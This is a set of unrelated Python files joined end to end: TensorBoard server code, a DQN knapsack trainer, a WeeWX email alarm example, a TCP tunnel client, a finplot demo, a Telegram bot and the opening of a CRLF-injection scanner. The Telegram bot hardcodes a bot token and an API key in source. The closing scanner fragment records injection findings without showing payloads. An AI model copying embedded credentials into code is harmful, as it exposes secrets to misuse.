request: A werkzeug request
Returns:
A werkzeug Response with the following content:
{runName: {images: [tag1, tag2, tag3],
audio: [tag4, tag5, tag6],
scalars: [tagA, tagB, tagC],
histograms: [tagX, tagY, tagZ],
firstEventTimestamp: 123456.789}}
"""
runs = self._multiplexer.Runs()
for run_name, run_data in runs.items():
try:
run_data['firstEventTimestamp'] = self._multiplexer.FirstEventTimestamp(
run_name)
except ValueError:
logging.warning('Unable to get first event timestamp for run %s',
run_name)
run_data['firstEventTimestamp'] = None
return http_util.Respond(request, runs, 'application/json')
@wrappers.Request.application
def _serve_index(self, request):
"""Serves the index page (i.e., the tensorboard app itself)."""
return self._serve_static_file(request, '/dist/index.html')
@wrappers.Request.application
def _serve_js(self, request):
"""Serves the JavaScript for the index page."""
return self._serve_static_file(request, '/dist/app.js')
def _serve_static_file(self, request, path):
"""Serves the static file located at the given path.
Args:
request: A werkzeug Request
path: The path of the static file, relative to the tensorboard/ directory.
Returns:
A werkzeug.Response application.
"""
# Strip off the leading forward slash.
orig_path = path.lstrip('/')
if not self._path_is_safe(orig_path):
logging.warning('path not safe: %s', orig_path)
return http_util.Respond(request, 'Naughty naughty!', 'text/plain', 400)
# Resource loader wants a path relative to //WORKSPACE/tensorflow.
path = os.path.join('tensorboard', orig_path)
# Open the file and read it.
try:
contents = resource_loader.load_resource(path)
except IOError:
# For compatibility with latest version of Bazel, we renamed bower
# packages to use '_' rather than '-' in their package name.
# This means that the directory structure is changed too.
# So that all our recursive imports work, we need to modify incoming
# requests to map onto the new directory structure.
path = orig_path
components = path.split('/')
components[0] = components[0].replace('-', '_')
path = ('/').join(components)
# Bazel keeps all the external dependencies in //WORKSPACE/external.
# and resource loader wants a path relative to //WORKSPACE/tensorflow/.
path = os.path.join('../external', path)
try:
contents = resource_loader.load_resource(path)
except IOError:
logging.warning('path %s not found, sending 404', path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)
mimetype, content_encoding = mimetypes.guess_type(path)
mimetype = mimetype or 'application/octet-stream'
return http_util.Respond(
request,
contents,
mimetype,
expires=3600,
content_encoding=content_encoding)
def __call__(self, environ, start_response): # pylint: disable=invalid-name
"""Central entry point for the TensorBoard application.
This method handles routing to sub-applications. It does simple routing
using regular expression matching.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec.
start_response: See WSGI spec.
Returns:
A werkzeug Response.
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
# Remove a trailing slash, if present.
clean_path = parsed_url.path
if clean_path.endswith('/'):
clean_path = clean_path[:-1]
# pylint: disable=too-many-function-args
if clean_path in self.data_applications:
return self.data_applications[clean_path](environ, start_response)
elif clean_path in TAB_ROUTES:
return self._serve_index(environ, start_response)
else:
return self._serve_static_file(request, clean_path)(environ,
start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon.
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/'):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(path)
files[path] = run_name
return files
def reload_multiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
logging.info('TensorBoard reload process beginning')
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logging.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logging.info('TensorBoard done reloading. Load took %0.3f secs', duration)
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
def _reload_forever():
while True:
reload_multiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_reload_forever)
thread.daemon = True
thread.start()
return thread
def get_tensorboard_tag():
"""Read the TensorBoard TAG number, and return it or an empty string."""
tag = resource_loader.load_resource('tensorboard/TAG').strip()
return tag
|
bounded_knsapsack_dqn_main.py | #!/usr/bin/env python3
import time
import torch
import torch.multiprocessing as mp
from torch import optim
import os
import numpy as np
from codes.f_utils.common_utils import make_or_gym_env
from config.names import EnvironmentName, PROJECT_HOME
print(torch.__version__)
from common.fast_rl import actions, value_based_model, rl_agent, experience_single, replay_buffer
from common.fast_rl.common import statistics, utils
from config.parameters import PARAMETERS as params
MODEL_SAVE_DIR = os.path.join(PROJECT_HOME, "out", "model_save_files")
if not os.path.exists(MODEL_SAVE_DIR):
os.makedirs(MODEL_SAVE_DIR)
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
if torch.cuda.is_available():
device = torch.device("cuda" if params.CUDA else "cpu")
else:
device = torch.device("cpu")
def play_func(exp_queue, env, net):
action_selector = actions.EpsilonGreedyDQNActionSelector(epsilon=params.EPSILON_INIT)
epsilon_tracker = actions.EpsilonTracker(
action_selector=action_selector,
eps_start=params.EPSILON_INIT,
eps_final=params.EPSILON_MIN,
eps_frames=params.EPSILON_MIN_STEP
)
agent = rl_agent.DQNAgent(net, action_selector, device=device)
experience_source = experience_single.ExperienceSourceSingleEnvFirstLast(env, agent, gamma=params.GAMMA, steps_count=params.N_STEP)
exp_source_iter = iter(experience_source)
if params.DRAW_VIZ:
stat = statistics.StatisticsForValueBasedRL(method="nature_dqn")
else:
stat = None
step_idx = 0
next_save_frame_idx = params.MODEL_SAVE_STEP_PERIOD
with utils.RewardTracker(params=params, frame=False, stat=stat) as reward_tracker:
while step_idx < params.MAX_GLOBAL_STEP:
step_idx += 1
exp = next(exp_source_iter)
exp_queue.put(exp)
epsilon_tracker.udpate(step_idx)
episode_rewards = experience_source.pop_episode_reward_lst()
if episode_rewards:
solved, mean_episode_reward = reward_tracker.set_episode_reward(
episode_rewards[0], step_idx, action_selector.epsilon
)
if step_idx >= next_save_frame_idx:
rl_agent.save_model(
MODEL_SAVE_DIR, params.ENVIRONMENT_ID.value, net.__name__, net, step_idx, mean_episode_reward
)
next_save_frame_idx += params.MODEL_SAVE_STEP_PERIOD
if solved:
rl_agent.save_model(
MODEL_SAVE_DIR, params.ENVIRONMENT_ID.value, net.__name__, net, step_idx, mean_episode_reward
)
break
exp_queue.put(None)
def main():
mp.set_start_method('spawn')
env_config = {
'N': 5,
'max_weight': 15,
'item_weights': np.array([1, 12, 2, 1, 4]),
'item_values': np.array([2, 4, 2, 1, 10]),
'mask': True
}
assert params.ENVIRONMENT_ID == EnvironmentName.KNAPSACK_V2
env = make_or_gym_env(params.ENVIRONMENT_ID.value, env_config=env_config)
print("Max weight capacity:\t{}kg".format(env.max_weight))
print("Number of items:\t{}".format(env.N))
obs_size = (env_config['N'] + 1) * 3
net = value_based_model.DuelingDQNMLP(
obs_size=obs_size,
hidden_size_1=128, hidden_size_2=128,
n_actions=5
).to(device)
print(net)
target_net = rl_agent.TargetNet(net)
buffer = replay_buffer.PrioReplayBuffer(experience_source=None, buffer_size=params.REPLAY_BUFFER_SIZE)
optimizer = optim.Adam(net.parameters(), lr=params.LEARNING_RATE)
exp_queue = mp.Queue(maxsize=params.TRAIN_STEP_FREQ * 2)
play_proc = mp.Process(target=play_func, args=(exp_queue, env, net))
play_proc.start()
time.sleep(0.5)
if params.DRAW_VIZ:
stat_for_value_optimization = statistics.StatisticsForValueBasedOptimization()
else:
stat_for_value_optimization = None
step_idx = 0
while play_proc.is_alive():
step_idx += params.TRAIN_STEP_FREQ
for _ in range(params.TRAIN_STEP_FREQ):
exp = exp_queue.get()
if exp is None:
play_proc.join()
break
buffer._add(exp)
if len(buffer) < params.MIN_REPLAY_SIZE_FOR_TRAIN:
if params.DRAW_VIZ and step_idx % 100 == 0:
stat_for_value_optimization.draw_optimization_performance(step_idx, 0.0)
continue
optimizer.zero_grad()
batch, batch_indices, batch_weights = buffer.sample(params.BATCH_SIZE)
loss_v, sample_prios = value_based_model.calc_loss_per_double_dqn(
buffer.buffer, batch, batch_indices, batch_weights, net, target_net, params, cuda=params.CUDA, cuda_async=True
)
loss_v.backward()
optimizer.step()
buffer.update_priorities(batch_indices, sample_prios.data.cpu().numpy())
buffer.update_beta(step_idx)
if params.DRAW_VIZ and step_idx % 100 == 0:
stat_for_value_optimization.draw_optimization_performance(step_idx, loss_v.item())
if step_idx % params.TARGET_NET_SYNC_STEP_PERIOD < params.TRAIN_STEP_FREQ:
target_net.sync()
if __name__ == "__main__":
main() |
alarm.py | # Copyright (c) 2009-2019 Tom Keffer <tkeffer@gmail.com>
# See the file LICENSE.txt for your rights.
"""Example of how to implement an alarm in WeeWX.
*******************************************************************************
To use this alarm, add the following to the weewx configuration file:
[Alarm]
expression = "outTemp < 40.0"
time_wait = 3600
smtp_host = smtp.example.com
smtp_user = myusername
smtp_password = mypassword
from = sally@example.com
mailto = jane@example.com, bob@example.com
subject = "Alarm message from weewx!"
In this example, if the outside temperature falls below 40, it will send an
email to the users specified in the comma separated list specified in option
"mailto", in this case:
jane@example.com, bob@example.com
The example assumes an SMTP email server at smtp.example.com that requires
login. If the SMTP server does not require login, leave out the lines for
smtp_user and smtp_password.
Setting an email "from" is optional. If not supplied, one will be filled in,
but your SMTP server may or may not accept it.
Setting an email "subject" is optional. If not supplied, one will be filled in.
To avoid a flood of emails, one will only be sent every 3600 seconds (one
hour).
*******************************************************************************
To enable this service:
1) copy this file to the user directory
2) modify the weewx configuration file by adding this service to the option
"report_services", located in section [Engine][[Services]].
[Engine]
[[Services]]
...
report_services = weewx.engine.StdPrint, weewx.engine.StdReport, user.alarm.MyAlarm
*******************************************************************************
If you wish to use both this example and the lowBattery.py example, simply
merge the two configuration options together under [Alarm] and add both
services to report_services.
*******************************************************************************
"""
import smtplib
import socket
import syslog
import threading
import time
from email.mime.text import MIMEText
import weewx
from weeutil.weeutil import timestamp_to_string, option_as_list
from weewx.engine import StdService
# Inherit from the base class StdService:
class MyAlarm(StdService):
"""Service that sends email if an arbitrary expression evaluates true"""
def __init__(self, engine, config_dict):
# Pass the initialization information on to my superclass:
super(MyAlarm, self).__init__(engine, config_dict)
# This will hold the time when the last alarm message went out:
self.last_msg_ts = 0
try:
# Dig the needed options out of the configuration dictionary.
# If a critical option is missing, an exception will be raised and
# the alarm will not be set.
self.expression = config_dict['Alarm']['expression']
self.time_wait = int(config_dict['Alarm'].get('time_wait', 3600))
self.timeout = int(config_dict['Alarm'].get('timeout', 10))
self.smtp_host = config_dict['Alarm']['smtp_host']
self.smtp_user = config_dict['Alarm'].get('smtp_user')
self.smtp_password = config_dict['Alarm'].get('smtp_password')
self.SUBJECT = config_dict['Alarm'].get('subject', "Alarm message from weewx")
self.FROM = config_dict['Alarm'].get('from', 'alarm@example.com')
self.TO = option_as_list(config_dict['Alarm']['mailto'])
syslog.syslog(syslog.LOG_INFO, "alarm: Alarm set for expression: '%s'" % self.expression)
# If we got this far, it's ok to start intercepting events:
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record) # NOTE 1
except KeyError as e:
syslog.syslog(syslog.LOG_INFO, "alarm: No alarm set. Missing parameter: %s" % e)
def new_archive_record(self, event):
"""Gets called on a new archive record event."""
# To avoid a flood of nearly identical emails, this will do
# the check only if we have never sent an email, or if we haven't
# sent one in the last self.time_wait seconds:
if not self.last_msg_ts or abs(time.time() - self.last_msg_ts) >= self.time_wait:
# Get the new archive record:
record = event.record
# Be prepared to catch an exception in the case that the expression contains
# a variable that is not in the record:
try: # NOTE 2
# Evaluate the expression in the context of the event archive record.
# Sound the alarm if it evaluates true:
if eval(self.expression, None, record): # NOTE 3
# Sound the alarm!
# Launch in a separate thread so it doesn't block the main LOOP thread:
t = threading.Thread(target=MyAlarm.sound_the_alarm, args=(self, record))
t.start()
# Record when the message went out:
self.last_msg_ts = time.time()
except NameError as e:
# The record was missing a named variable. Log it.
syslog.syslog(syslog.LOG_DEBUG, "alarm: %s" % e)
def sound_the_alarm(self, rec):
"""Sound the alarm in a 'try' block"""
# Wrap the attempt in a 'try' block so we can log a failure.
try:
self.do_alarm(rec)
except socket.gaierror:
# A gaierror exception is usually caused by an unknown host
syslog.syslog(syslog.LOG_CRIT, "alarm: unknown host %s" % self.smtp_host)
# Reraise the exception. This will cause the thread to exit.
raise
except Exception as e:
syslog.syslog(syslog.LOG_CRIT, "alarm: unable to sound alarm. Reason: %s" % e)
# Reraise the exception. This will cause the thread to exit.
raise
def do_alarm(self, rec):
"""Send an email out"""
# Get the time and convert to a string:
t_str = timestamp_to_string(rec['dateTime'])
# Log the alarm
syslog.syslog(syslog.LOG_INFO, 'alarm: Alarm expression "%s" evaluated True at %s' % (self.expression, t_str))
# Form the message text:
msg_text = 'Alarm expression "%s" evaluated True at %s\nRecord:\n%s' % (self.expression, t_str, str(rec))
# Convert to MIME:
msg = MIMEText(msg_text)
# Fill in MIME headers:
msg['Subject'] = self.SUBJECT
msg['From'] = self.FROM
msg['To'] = ','.join(self.TO)
try:
# First try end-to-end encryption
s = smtplib.SMTP_SSL(self.smtp_host, timeout=self.timeout)
syslog.syslog(syslog.LOG_DEBUG, "alarm: using SMTP_SSL")
except (AttributeError, socket.timeout, socket.error):
syslog.syslog(syslog.LOG_DEBUG, "alarm: unable to use SMTP_SSL connection.")
# If that doesn't work, try creating an insecure host, then upgrading
s = smtplib.SMTP(self.smtp_host, timeout=self.timeout)
try:
# Be prepared to catch an exception if the server
# does not support encrypted transport.
s.ehlo()
s.starttls()
s.ehlo()
syslog.syslog(syslog.LOG_DEBUG,
"alarm: using SMTP encrypted transport")
except smtplib.SMTPException:
syslog.syslog(syslog.LOG_DEBUG,
"alarm: using SMTP unencrypted transport")
try:
# If a username has been given, assume that login is required for this host:
if self.smtp_user:
s.login(self.smtp_user, self.smtp_password)
syslog.syslog(syslog.LOG_DEBUG, "alarm: logged in with user name %s" % self.smtp_user)
# Send the email:
s.sendmail(msg['From'], self.TO, msg.as_string())
# Log out of the server:
s.quit()
except Exception as e:
syslog.syslog(syslog.LOG_ERR, "alarm: SMTP mailer refused message with error %s" % e)
raise
# Log sending the email:
syslog.syslog(syslog.LOG_INFO, "alarm: email sent to: %s" % self.TO)
if __name__ == '__main__':
"""This section is used to test alarm.py. It uses a record and alarm
expression that are guaranteed to trigger an alert.
You will need a valid weewx.conf configuration file with an [Alarm]
section that has been set up as illustrated at the top of this file."""
from optparse import OptionParser
import weecfg
usage = """Usage: python alarm.py --help
python alarm.py [CONFIG_FILE|--config=CONFIG_FILE]
Arguments:
CONFIG_PATH: Path to weewx.conf """
epilog = """You must be sure the WeeWX modules are in your PYTHONPATH. For example:
PYTHONPATH=/home/weewx/bin python alarm.py --help"""
weewx.debug = 1
# Set defaults for the system logger:
syslog.openlog('alarm.py', syslog.LOG_PID | syslog.LOG_CONS)
syslog.setlogmask(syslog.LOG_UPTO(syslog.LOG_DEBUG))
# Create a command line parser:
parser = OptionParser(usage=usage,
epilog=epilog)
parser.add_option("--config", dest="config_path", metavar="CONFIG_FILE",
help="Use configuration file CONFIG_FILE.")
# Parse the arguments and options
(options, args) = parser.parse_args()
try:
config_path, config_dict = weecfg.read_config(options.config_path, args)
except IOError as e:
exit("Unable to open configuration file: %s" % e)
print("Using configuration file %s" % config_path)
if 'Alarm' not in config_dict:
exit("No [Alarm] section in the configuration file %s" % config_path)
# This is a fake record that we'll use
rec = {'extraTemp1': 1.0,
'outTemp': 38.2,
'dateTime': int(time.time())}
# Use an expression that will evaluate to True by our fake record.
config_dict['Alarm']['expression'] = "outTemp<40.0"
# We need the main WeeWX engine in order to bind to the event, but we don't need
# for it to completely start up. So get rid of all services:
config_dict['Engine']['Services'] = {}
# Now we can instantiate our slim engine...
engine = weewx.engine.StdEngine(config_dict)
# ... and set the alarm using it.
alarm = MyAlarm(engine, config_dict)
# Create a NEW_ARCHIVE_RECORD event
event = weewx.Event(weewx.NEW_ARCHIVE_RECORD, record=rec)
# Use it to trigger the alarm:
alarm.new_archive_record(event)
|
tunnel_tcp.py | import sys
import json
import threading
import websockets
import ssl
import certifi
from .tcp import Client
ssl_context = ssl.create_default_context()
ssl_context.load_verify_locations(certifi.where())
async def open_tcp_tunnel(ws_uri, remote_server_host, local_server_port,local_server_host):
async with websockets.connect(ws_uri, ssl=ssl_context) as websocket:
message = json.loads(await websocket.recv())
if message.get("warning"):
print(message["warning"], file=sys.stderr)
if message.get("error"):
print(message["error"], file=sys.stderr)
return
public_server_port = message["public_server_port"]
private_server_port = message["private_server_port"]
print(f"\033[32m{'Tunnel Status':<25}Online\033[00m")
print(f"{'Forwarded':<25}{f'{remote_server_host}:{public_server_port} → {local_server_host}:{local_server_port}'}\n")
client = Client(remote_server_host=remote_server_host,remote_server_port=private_server_port,local_server_host=local_server_host,local_server_port=local_server_port)
while True:
message = json.loads(await websocket.recv())
print("New Connection +1")
threading.Thread(target=client.process, args=(message, websocket)).start()
|
thread.py | import threading
def fire_and_forget(f):
"""
Use as such:
Example
----------
.. code-block::
@fire_and_forget
def send_analytics():
...
"""
def wrapped():
threading.Thread(target=f).start()
return wrapped
|
dockable.py | #!/usr/bin/env python3
import finplot as fplt
from functools import lru_cache
from PyQt5.QtWidgets import QApplication, QGridLayout, QMainWindow, QGraphicsView, QComboBox, QLabel
from pyqtgraph.dockarea import DockArea, Dock
from threading import Thread
import yfinance as yf
app = QApplication([])
win = QMainWindow()
area = DockArea()
win.setCentralWidget(area)
win.resize(1600,800)
win.setWindowTitle("Docking charts example for finplot")
# Set width/height of QSplitter
win.setStyleSheet("QSplitter { width : 20px; height : 20px; }")
# Create docks
dock_0 = Dock("dock_0", size = (1000, 100), closable = True)
dock_1 = Dock("dock_1", size = (1000, 100), closable = True)
dock_2 = Dock("dock_2", size = (1000, 100), closable = True)
area.addDock(dock_0)
area.addDock(dock_1)
area.addDock(dock_2)
# Create example charts
combo = QComboBox()
combo.setEditable(True)
[combo.addItem(i) for i in "AMRK FB GFN REVG TSLA TWTR WMT CT=F GC=F ^FTSE ^N225 EURUSD=X ETH-USD".split()]
dock_0.addWidget(combo, 0, 0, 1, 1)
info = QLabel()
dock_0.addWidget(info, 0, 1, 1, 1)
# Chart for dock_0
ax0,ax1,ax2 = fplt.create_plot_widget(master=area, rows=3, init_zoom_periods=100)
area.axs = [ax0, ax1, ax2]
dock_0.addWidget(ax0.ax_widget, 1, 0, 1, 2)
dock_1.addWidget(ax1.ax_widget, 1, 0, 1, 2)
dock_2.addWidget(ax2.ax_widget, 1, 0, 1, 2)
# Link x-axis
ax1.setXLink(ax0)
ax2.setXLink(ax0)
win.axs = [ax0]
@lru_cache(maxsize = 15)
def download(symbol):
return yf.download(symbol, "2019-01-01")
@lru_cache(maxsize = 100)
def get_name(symbol):
return yf.Ticker(symbol).info ["shortName"]
plots = []
def update(txt):
df = download(txt)
if len(df) < 20: # symbol does not exist
return
info.setText("Loading symbol name...")
price = df ["Open Close High Low".split()]
ma20 = df.Close.rolling(20).mean()
ma50 = df.Close.rolling(50).mean()
volume = df ["Open Close Volume".split()]
ax0.reset() # remove previous plots
ax1.reset() # remove previous plots
ax2.reset() # remove previous plots
fplt.candlestick_ochl(price, ax = ax0)
fplt.plot(ma20, legend = "MA-20", ax = ax1)
fplt.plot(ma50, legend = "MA-50", ax = ax1)
fplt.volume_ocv(volume, ax = ax2)
fplt.refresh() # refresh autoscaling when all plots complete
Thread(target=lambda: info.setText(get_name(txt))).start() # slow, so use thread
combo.currentTextChanged.connect(update)
update(combo.currentText())
fplt.show(qt_exec = False) # prepares plots when they're all setup
win.show()
app.exec_()
|
app.py | # -*- coding: utf-8 -*-
from datetime import datetime
from flask import Flask
from flask import render_template, request
import logging
import telegram
import leancloud
from leancloud import Engine, Query, Object, LeanCloudError
import random
import re
import sys
import urllib2
import json
import threading
reload(sys)
sys.setdefaultencoding('utf-8')
app = Flask(__name__)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
bot_name = '@hellochain_bot'
global bot
# 由于 美国节点,只能 git 部署,我不得不开源 token,请不要随便拿去用,如需生成你自己的 token
# 请联系 http://telegram.me/BotFather 谢谢!
bot = telegram.Bot(token='592757318:AAFF9fFtPiO0DoQEa1-zwxjtKbCXQqen8Rw')
songci_api = 'http://api.jisuapi.com/songci/search?appkey=7528478e273bd00b&keyword='
@app.route('/')
def index():
return r'{"drakeet":"hehe"}'
@app.route('/<token>', methods=['POST'])
def launcher(token):
if request.method == "POST":
update = telegram.Update.de_json(request.get_json(force=True), bot)
logging.info('I am still alive.')
try:
handle_message(update.message)
except:
logging.info('handle_message ERROR')
return 'ok'
def handle_message(message):
# if message == None:
# return
text = message.text
if text == None:
logging.info('Warning: message.text == None')
return
if '/echo' in text:
echo(message)
elif '/milestone' in text:
milestone(message)
elif '/help' in text:
help(message)
elif '/getmylastat' in text:
get_my_last_at(message)
# elif '/pic' in text:
# pic(message)
# elif '/delpic' in text:
# delpic(message)
elif '/songci' in text:
songci(message)
elif '/alias' in text:
alias(message)
elif '/xu' in text:
xu(message)
elif not '@' in text and not '/' in text:
alias_filter(message)
if not '/' in text and '@' in text:
save_at_message(message)
logging.info(text)
def help(message):
text = ('/echo - Repeat the same message back\n'
'/milestone - Get drakeet\'s milestone\n'
'/getmylastat - Get my last @ message\n'
'/pic - Curiosity killed the cat\n'
'/delpic - Delete pic by its num\n'
'/songci - TEXT')
bot.sendMessage(chat_id=message.chat.id, text=text)
def parse_cmd_text(text):
# Telegram understands UTF-8, so encode text for unicode compatibility
text = text.encode('utf-8')
cmd = None
if '/' in text:
try:
index = text.index(' ')
except ValueError as e:
return (text, None)
cmd = text[:index]
text = text[index + 1:]
if cmd != None and '@' in cmd:
cmd = cmd.replace(bot_name, '')
return (cmd, text)
def parse_text_array(text):
if text == None:
return []
else:
return text.split()
def get_nickname(user):
if user.first_name != None and user.last_name != None:
return '%s %s' % (user.first_name, user.last_name)
elif user.first_name == None:
return user.last_name
elif user.last_name == None:
return user.first_name
def send_successful(message):
bot.sendMessage(chat_id=message.chat.id, reply_to_message_id=message.message_id, text='Successful')
def echo(message):
'''
repeat the same message back (echo)
'''
cmd, text = parse_cmd_text(message.text)
if text == None or len(text) == 0:
pass
else:
chat_id = message.chat.id
bot.sendMessage(chat_id=chat_id, text=text)
def milestone(message):
from_day = datetime(2013, 7, 16)
now = datetime.now()
text = 'drakeet 和他家老婆大人已经认识并相爱 %d 天啦(此处应该有恭喜' % (now - from_day).days
chat_id = message.chat.id
bot.sendMessage(chat_id=chat_id, text=text)
def random_line(afile):
line = next(afile)
for num, aline in enumerate(afile):
if random.randrange(num + 2): continue
line = aline
return line
def random_text(message):
'''
Deprecated
'''
Text = Object.extend('Text')
_query = Query(Text)
count = _query.count()
skip = random.randint(0, count - 1)
texts = _query.limit(1).skip(skip).find()
if len(texts) == 1:
text = texts[0]
else:
return
bot.sendMessage(chat_id=message.chat.id, text=text)
AtMessage = Object.extend('AtMessage')
def save_at_message_with_username(message, username):
msg = AtMessage()
msg.set('owner', username)
msg.set('mid', message.message_id)
msg.set('chat_id', message.chat.id)
msg.save()
def save_at_message(message):
try:
username = re.findall(r'@(\w*)\s', message.text)[0]
except IndexError as e:
return
save_at_message_with_username(message, username)
def get_my_last_at(message):
'''
todo: relate the origin chat id.
'''
query = Query(AtMessage)
query.descending('createdAt')
query.equal_to('owner', message.from_user.username)
query.equal_to('chat_id', message.chat.id)
try:
msg = query.first()
except LeanCloudError as e:
bot.sendMessage(chat_id=message.chat.id, reply_to_message_id=message.message_id, text='你在本群还没有任何 AT 消息。')
return
text = 'Here you are.'
message_id = msg.get('mid')
bot.sendMessage(chat_id=message.chat.id, reply_to_message_id=message_id, text=text)
Pic = Object.extend('Pic')
def pic(message):
cmd, text = parse_cmd_text(message.text)
url = None
base_url = 'http://7xqh4i.com1.z0.glb.clouddn.com/pic'
if text != None:
url = base_url + str(text)
pic_num = text
else:
query = Query(Pic)
pics = query.find()
bolcks = [pic.get('pid') for pic in pics]
pic_num = None
size_of_images = 330 # 0~size_of_images
while pic_num == None or str(pic_num) in bolcks:
pic_num = random.randint(0, size_of_images)
url = base_url + str(pic_num)
bot.sendChatAction(chat_id=message.chat.id, action=telegram.ChatAction.UPLOAD_PHOTO)
def send_photo_task():
bot.sendPhoto(chat_id=message.chat.id,
photo=url + '.jpg',
caption=pic_num)
t = threading.Thread(target=send_photo_task)
t.start()
def delpic(message):
cmd, text = parse_cmd_text(message.text)
if text == None:
bot.sendMessage(chat_id=message.chat.id, reply_to_message_id=message.message_id, text='Use /delpic <pic\'s num>')
return
query = Query(Pic)
query.equal_to('pid', text)
pics = query.find()
if pics == None or len(pics) == 0:
pic = Pic()
pic.set('pid', text)
pic.save()
send_successful(message)
def songci(message):
cmd, text = parse_cmd_text(message.text)
if text == None or len(text) == 0:
bot.sendMessage(chat_id=message.chat.id,
reply_to_message_id=message.message_id,
text='请使用 /songci <词名>')
return
bot.sendChatAction(chat_id=message.chat.id, action=telegram.ChatAction.TYPING)
text = text.replace(' ', '·')
keyword = urllib2.quote(text)
response = urllib2.urlopen(songci_api + keyword)
data = json.loads(response.read())
Songci = Object.extend('Songci')
__songci = Songci()
__songci.set('keyword', keyword)
__songci.set('data', response.read())
__songci.save()
try:
a_songci = data['result']['list'][0]
except TypeError as e:
bot.sendMessage(chat_id=message.chat.id,
reply_to_message_id=message.message_id,
text='找不到对应的宋词')
return
__text = a_songci['title'] + '\n' + a_songci['author'] + '\n' + a_songci['content']
block_chars = '⓪①②③④⑤⑥⑦⑧⑨⑩⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳❶❷❸❹❺❻❼❽❾❿⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽⑾⑿⒀⒁⒂⒃⒄⒅⒆⒇'
temp = ''
for c in __text:
if not c in block_chars:
temp += c
__text = temp.replace(' ', ' ').replace('<br />', '\n')
bot.sendMessage(chat_id=message.chat.id, text=__text)
Haha = Object.extend('Haha')
def xu(message):
query = Query(Haha)
haha = query.first()
life = int(haha.get('life')) + 1
haha.increment('life', 1)
haha.save()
reply = get_nickname(message.from_user) + ' 续了 1 秒,excited! 已经续了 ' + str(life) + ' 秒了。'
bot.sendMessage(chat_id=message.chat.id, text=reply)
Alias = Object.extend('Alias')
def alias_filter(message):
text = message.text
query = Query(Alias)
alises = query.find()
if len(alises) == 0:
return
catch = False
aliases_dict = {x.get('key'): x.get('value') for x in alises}
keys = [x.get('key') for x in alises]
# make the longer key be replaced first
matches = sorted(re.findall('|'.join(keys), text), key=lambda x: len(x), reverse=True)
if len(matches) > 0:
catch = True
if len(matches) == 1:
if aliases_dict.get(matches[0]) == ('@' + message.from_user.username):
return
for m in matches:
if '@' in aliases_dict.get(m):
prefix = ' '
if (prefix + m) in text:
text = text.replace(m, aliases_dict.get(m) + ' ')
else:
text = text.replace(m, prefix + aliases_dict.get(m) + ' ')
else:
text = text.replace(m, aliases_dict.get(m))
if catch == True:
text = get_nickname(message.from_user) + ': ' + text
bot.sendMessage(chat_id=message.chat.id,
text=text)
def help_for_alias(message):
try:
return bot.sendMessage(chat_id=message.chat.id,
reply_to_message_id=message.message_id,
text='请使用 /alias <key> <value> 表示用 key 替换 value')
except:
logging.info('Reply message not found')
def alias(message):
cmd, text = parse_cmd_text(message.text)
texts = parse_text_array(text)
if len(texts) == 0 or len(texts) > 2:
return help_for_alias(message)
query = Query(Alias)
query.equal_to('key', texts[0])
try:
__old_a = query.first()
except LeanCloudError as e:
__old_a = None
if __old_a != None and len(texts) == 1:
__old_a.destroy()
elif __old_a == None and len(texts) == 2:
a = Alias()
a.set('key', texts[0])
a.set('value', texts[1])
a.save()
elif len(texts) == 2:
__old_a.set('value', texts[1])
__old_a.save()
send_successful(message)
|
crlf_injection.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import ninja
import argparse
import timeit
import multiprocessing as mp
import sys
# save_data의 경우는 함수마다 공격의 결과값을 판단하는 패턴이 다르므로 개별로 정의
class crlf(ninja.web):
def save_data(self, method, case, url, payloads, res):
self.collection_saving_results = self.db["report"]
print res.url
res_content = res.content
headers = res.headers
for header in headers.keys():
if (header.find("injected") != -1) or (headers[header].find("injected") != -1):
# case2 and post
if payloads:
self.collection_saving_results.insert({"url" : url,
"attack name" : "crlf injection",
"method" : method,
"case" : case,
"payload" : str(res.url) + str(payloads),
"res_code" : res.status_code,
"res_length" : len(str(res.content)),
